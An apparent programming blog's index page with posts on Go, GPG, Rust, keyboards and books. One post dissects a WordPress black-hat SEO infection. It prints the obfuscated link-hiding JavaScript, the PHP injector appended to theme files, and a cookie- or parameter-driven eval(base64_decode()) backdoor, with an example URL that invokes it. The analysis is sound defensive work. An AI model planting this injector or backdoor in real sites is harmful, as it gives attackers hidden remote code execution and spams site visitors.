March 1, 2014

Three best programming books

Posted in Software at 23:19 by graham

Here are my three favorite programming books, the ones I consider most important and would most recommend. There’s a good list on stack overflow too, if you prefer the wisdom of crowds to the wisdom of me.

Code Complete, Steve McConnell

This is the book that took me from enthusiastic amateur to professional. It covers the programming-in-the-small that you will do every day for the rest of your career: Naming variables, writing for loops, that type of thing. I know, you know how to write a for loop already.

This book will make you better at the small things.

Code Complete: A Practical Handbook of Software Construction

The Art of Unix Programming, Eric S. Raymond

It took me a very long time to read this book. I would pick it, get a few pages in, have an epiphany, and go re-write some things.

Unix is the only constant in our world. The programming language you use will change many times, the tools you use will change all the time, and even SQL is not as much of a constant as it once was. But Unix will always be there for you. Improving your Unix knowledge is the single best investment you can make as a programmer.

But this is not just a book about Unix. It’s a book about the philosophy of Unix, about The Way, and it intends to bring you enlightenment in the Zen Buddhism sense.

For me at least, it did.

The Art of UNIX Programming

The Linux Programming Interface, Michael Kerrisk

This is the Linux grimoire, the spell book with all the spells. It’s over $60, 1500 pages, and you must never get it wet or read it after midnight.

Pretty much everything interesting you do in Linux (open a file, write to a socket, start a process, sleep. allocate memory, everything) is a syscall. This books is all the syscalls, and extensive information around them.

It will answer all your questions.

The Linux Programming Interface: A Linux and UNIX System Programming Handbook

December 12, 2013

Go: How slices grow

Posted in Software at 05:49 by graham

In Go (golang) what happens to memory when you append to a slice?

If there’s enough space in the slice’s backing array, the element just gets added. If there’s not enough space, a new array is allocated, all the items are copied over, and the new item is added at the end. The interesting part is allocating that new array. And here’s the answer:

Go slices grow by doubling until size 1024, after which they grow by 25% each time

This is an implementation detail and may change. The above is correct for Go 1.1 and 1.2.

Try it out:

package main

import "fmt"

func main() {
    var x []int  // Same as x := make([]int, 0)
    for i := 0; i < 100; i++ {
        fmt.Printf("%d: %p cap %d\n", i, x, cap(x))
        x = append(x, i)
    }
}

Read the rest of this entry »

December 7, 2013

Kinesis Advantage after four months

Posted in Software at 23:58 by graham

I have been using a Kinesis Advantage keyboard for the past four months, since August. I love it. Here’s my trip report.

Kinesis Advantage

Before this keyboard I had been using Microsoft Natural keyboards for many many years.

Let’s cut straight to the chase: The first three days were very hard. It’s the same feeling as when I switched to vim. You tell your fingers to do something and they don’t do it. It’s especially hard when you do lots of text chat. My typing rate went way down, so I couldn’t ‘talk’ as fast.

Read the rest of this entry »

October 22, 2013

Realtime Conf 2013: Favorite talks

Posted in Software at 05:33 by graham

Realtime Conf 2013 just finished in Portland. It was an unusual conference in many ways. The “production values” and effort the &yet team put into it were simply astounding. The conference included, amongst others, a book, a play, a marching band, boxes of dirt, meth samples, and a beautiful song (skip to 3:50).

All the videos are online. These are my three favorite:

Isaac Schleuter: Leadership and open source: Also known as “Z”, he is the main author of npm and leader of the node.js community. He teaches leadership in tweets, around a core philosophy of empathy, compassion, and grit. If your life involves having to interact with humans, I’d recommend this talk.

Ilya Grigorik: Making HTTP realtime with HTTP 2.0: HTTP 2.0 is the next version of HTTP. It is based on SPDY. It could be ready as early as next year. And it’s way cool.

Eric Rescoria: What WebRTC is good for: He wrote much of Firefox’s WebRTC implementation, and some of Chrome’s, so if you want to learn about WebRTC, watch this.

The best part for me were the conversations (especially with the XMPP folks) and how generous everyone was with their time and explanations.

September 17, 2013

WordPress Black Hat SEO dissected

Posted in Software at 21:00 by graham

Last weekend a friend asked me why there were pharma links hidden in her GoDaddy hosted WordPress site, and that led me into the WordPress black hat SEO rabbit hole.

Front end

This is what we were seeing:

pharma-links

From a browser the site looked fine. The links had been there undetected for five months! The HTML is being hidden by this CSS:

<style type="text/css">.blogcycle_p{position:absolute;clip:rect(438px,auto,auto,438px);}</style>

But that CSS doesn’t appear anywhere on the page. It’s being written out by this obfuscated Javascript:

var _gw7 = [];
_gw7.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
_gw7.push(['_setOption', '6918518510413211616817818117316919116917817116518219318']);
_gw7.push(['_trackPageview', '2181185175186175181180128167168185181178187186171129169']);
_gw7.push(['_setOption', '1781751821281841711691861101221211261821901141671871861']);
_gw7.push(['_trackPageview', '8111416718718618111412212112618219011112919513011718518']);
_gw7.push(['_setOption', '6191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw7.length; v++) t += _gw7[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Presumably this is being done so that Google doesn’t notice that the links are not visible. The number in the _gw7 variable name varies – maybe it’s random or maybe a version number. You can find many other victims by searching for 13018518….

Back end – display

The big question then became: How the hell is this getting onto the page?

The answer is the PHP has been edited. The functions.php in every single theme had this appended to the bottom (scroll all the way to the right for the important part):

if (!function_exists("b_call")) {
function b_call() {
if (!ob_get_level()) ob_start("b_goes");
}
function b_goes($p) {
if (!defined('wp_m1')) {
    if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in()) || (!$m = get_option('_iconfeed1'))) {
        return $p;
    }
    list($m, $n) = @unserialize(trim(strrev($m)));
    define('wp_m1', $m);
    define('wp_n1', $n);
}
if (!stripos($p, wp_n1)) $p = preg_replace("~<body[^>]*>~i", "$0\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</head>~", wp_m1."\n</head>", $p, 1);
if (!stripos($p, wp_n1)) $p = preg_replace("~</div>~", "</div>\n".wp_n1, $p, 1);
if (!stripos($p, wp_m1)) $p = preg_replace("~</div>~", wp_m1."\n</div>", $p, 1);
return $p;
}
function b_end() {
@ob_end_flush();
}
if (ob_get_level()) ob_end_clean();
add_action("init", "b_call");
add_action("wp_head", "b_call");
add_action("get_sidebar", "b_call");
add_action("wp_footer", "b_call");
add_action("shutdown", "b_end");
}

My knowledge of WordPress is basic, so the first few times I looked at this it seemed fine. It was only thanks to an analysis by NinjaFirewall that I went and looked again. The get_option('_iconfeed1') is reading from the database, reversing the value, and injecting it into the page. The name of the option changes, presumably it’s picked from a list at infection time. There’s a nice touch here where it doesn’t show to logged in users, which probably complicates investigation (“My site looks fine, your computer must have a virus or something!”).

In the wp_options database table that _iconfeed1 contains the Javascript and HTML string with all the pharma links, reversed. Why is it reversed? I’m not sure. Maybe it defeats some wordpress plugins that look for this type of thing. It certainly defeated my initial grep of the database dump.

Back end – input

But wait, it’s about to get so much better, because the next question is how the hell did they write to wp_options. An svn diff of the wordpress install against the repo reveals these new files:

  • wp-content//entry-nav.php # In several, but not all, themes
  • wp-content//sidebar-meta.php # Only in one theme
  • wp-admin/ms-media.php
  • wp-admin/includes/class-wp-menu.php
  • wp-includes/theme-compat/archive.php
  • wp-includes/post-load.php

The names differ on other infected sites, but seem chosen to look like parts of WordPress. And what’s in those file? Oh, you’re in for a treat – here’s the first few lines of one:

$bawdy= 'T';
$concoct = 'e';$cretin= '2XRa)$r)';$eyers= ';$_';

$befogged= 'e'; $gayety ='a';$jolynn ='8'; $armour ='$0QP('; $hotdick ='K';$brief='a)Q$TM';$boxtop = 'e'; $grating='i'; $fuckyoufuckyou ='s';$claus='P';
$blitzes = '$[n>EO_';$cancels = 'N(gL';$fernanda= 'cV;E;r)6';$hasty =':i_e_';

$carla = '$(Wa'; $duplicable=',2aC(';
$dolli = 't'; $contributing='$';

They all follow the same pattern, with variables names clearly taken from a word list. Most of them didn't seem to run, they were missing variable and a closing php tag. For analysis, here's a full one (minus php tag) that did run, and that I've hacked around to display it's output: obfuscated php (To understand it look for 'hello').

It decodes to this:

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);
$a=isset($i["b02005f9ffdf8"])
    ? $i["b02005f9ffdf8"]:
(isset($i["HTTP_B02005F9FFDF8"])?$i["HTTP_B02005F9FFDF8"]:die
);
eval(base64_decode($a));)

That takes base64 encoded PHP code in either a URL parameter or a cookie, and runs it. The cookie part is nice, because it won’t show in the access logs. The hex string is a nice touch too. It changes for each infection, so other people will have a hard time taking advantage of the back door.

To run echo "<h1>Hello</h1>"; the attacker would hit something like:

http://example.com/wp-includes/post-load.php?b02005f9ffdf8=ZWNobyAiPGgxPkhlbGxvPC9oMT4iOw==

Who did it? How?

Who did it? In the apache access logs the only hit I see on one of those injection scripts is from a hosting provider in Germany that does VPS and dedicated hosting. One single hit, and because it has a cookie I don’t have the PHP that they ran. Around that time I see a ton of probing from an address in Israel, a little suspicious given that the site is a local Canadian business, but it’s certainly not conclusive. I have no idea who did it.

How? I’m not sure. There were only two accounts on that site, with what I’d consider good passwords. Like every WordPress site it was getting lots of brute force cracking attempts, but POSTing to the login page gets you about 2 attempts / second (my sites use BruteProtect to reduce this). My leading theory then is that the attackers got into a different site on the shared hosting, and just wrote into every other site on that machine (which are just different directories it seems).

How did I fix it? I moved my friend off GoDaddy’s shared hosting, to my own wordpress multi-site on a Linode server.

The crazy part is that the sole purpose of the attack is to raise the page rank of some pharma links. I didn’t realise SEO was such big business that people would go to all this work.

I am also quite in admiration of the poor programmer who had to build this. Imagine trying to debug the CSS that was output by your reversed obfuscated Javascript, which was written into the database by base 64 encoding it and feeding it to an obfuscated PHP script! I tip my hat to you, Mr Back Hat SEO programmer.

Here are some other people who have the same problem but with different variables. And here’s what seems to be an earlier variant of this attack.

If you have any more information about his, please let me know in the comments, and I’ll update the post. Thanks!

July 30, 2013

How GPG works: Encrypt

Posted in Software at 22:02 by graham

Here’s what happens when you encrypt a message with GPG / GnuPG (and probably other OpenPGP implementations):

  1. Generate session key

    When you encrypt a file to someone (-r person on the command line), GPG generates a session key, which is a large random number. You can see it when you decrypt a message:

    gpg --show-session-key myfile.gpg
    
  2. Choose a symmetric cipher

    GPG then looks at the recipients public key to find their preferred symmetric cipher. If you have my key on your ring (get it by doing gpg --recv-keys 0x127CFCD9B3B929D2) you can see my preferred symmetric cipher by typing:

    gpg -r graham -e --verbose test.txt
    

    It should be AES256.

  3. Encrypt using chosen cipher and generated session key

    Next it compresses then encrypts the file using the session key and the preferred cipher. So until now we’re still all symmetric encryption.

  4. Encrypt session key with public key

    Finally it encrypts that session key using the recipients public key (using RSA), and prepends the result to the front of the message. If there are several recipients, this step is repeated once for each person.

The passphrase GPG asks for when decrypting or signing a message, has nothing to do with message encryption. It is only used to symmetric encrypt your private key (default is CAST5 cipher). That’s in case someone steals your private key file. In terms of how GPG works, you can ignore the passphrase. If you just encrypt a message (without signing it) you won’t need to enter your passphrase at all (but in practice your should always sign your messages).

July 21, 2013

Online upgrades in Go

Posted in Software at 05:40 by graham

tl;dr Send your socket fd over a UNIX domain socket: syscall/passfd_test.go.

When your server holds long running connections (WebSocket, long-running HTTP, IRC, XMPP, etc) you often want to be able to upgrade the server without dropping the connections (zero downtime upgrade). In UNIX there are at least two ways to do this:

  1. Inherit the file descriptor
  2. Send the file descriptor over a domain socket

The first one is straightforward, because a UNIX process automatically inherits the file descriptors of it’s parent, except if they have the close-on-exec flag set. Go complicates things a bit by always setting that flag on it’s sockets (in net/sock_cloexec.go). For a child process to inherit it’s parent’s file descriptors, you have to manually add them to ExtraFiles in os/exec/Cmd. There’s an example in TestExtraFiles in os/exec/exec_test.go.

Usually you need to send more that just the connections to the child process. There will be some state, and probably a communication where the child tells the parents it’s ready to take over (after priming it’s cache, for example). Hence the second approach, unix domain sockets, is more interesting.

Read the rest of this entry »

May 2, 2013

We are all polyglots

Posted in Software at 17:24 by graham

I used to know two programming languages at any one time; what I called a serious language and a what I called a scripting language. My initial serious language was C, my scripting language was Perl. The serious language was for client work, it paid the bills. The scripting language was for tools and toys (which is why many early web-apps were Perl CGI scripts).

We’ve been replacing C as our serious language since the 70s. C++ mostly succeeded, and became the official language of Microsoft Windows. Objective-C got a solid niche when Apple chose it for OSX, and later iOS. Java, became the serious language of web apps, and is now the language of Android. The two recent exciting developments here are Go and Rust.

In scripting-language world, Perl was largely replaced by Python and Ruby, and for web-app work by PHP.

So by now my serious language was Java, and my scripting language Python. But then three interesting things happened.

Read the rest of this entry »

April 26, 2013

Rust: What I learnt so far

Posted in Software at 22:58 by graham

This applies to 0.7pre, many things have changed in 0.8. Particularly core was renamed to std, and std renamed to extra.

Rust is an open-source programming language being developed mostly by Mozilla. It’s goal is the type of applications currently written in C++ (such as Firefox). Details at the Rust Wikipedia page.

I’ve been learning bits of it the past few days, and whilst Rust is still rough around the edges there’s a lot to enjoy. Rust is only at v0.7pre and changing daily, so you may have to adjust some of the code here.

Rust is a big language, and unless you come from C++ it will probably make your head hurt. In a good way :-)

The two most helpful introductions I have found so far are:

I’d encourage you to run through both of those, starting with Rust for Rubyists. When you get stuck reading one of them (and you will), switch back here.

Contents:

Install

At time of writing Rust is v0.7pre:

Read the rest of this entry »

March 26, 2013

PyCon 2013: My two favorite talks

Posted in Software at 16:41 by graham

PyCon is an annual gathering of Python programmers. All the talks are recorded and distributed freely on the web. My two favorite talks were:

« Previous entries Next Page » Next Page »